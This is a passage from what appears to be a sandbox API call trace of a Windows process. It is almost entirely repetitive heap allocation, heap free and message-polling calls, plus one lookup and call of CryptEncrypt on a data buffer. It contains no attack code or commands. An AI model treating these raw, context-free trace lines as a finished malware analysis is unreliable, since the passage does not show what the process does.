returned 1 [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.985] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.985] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.986] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.986] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0263.987] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0263.987] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.987] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.988] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.988] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0263.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c6540 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aaec0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.995] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0263.996] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x142e4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x142e8) returned 1 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.998] HeapFree (in: hHeap=0x25c0000, 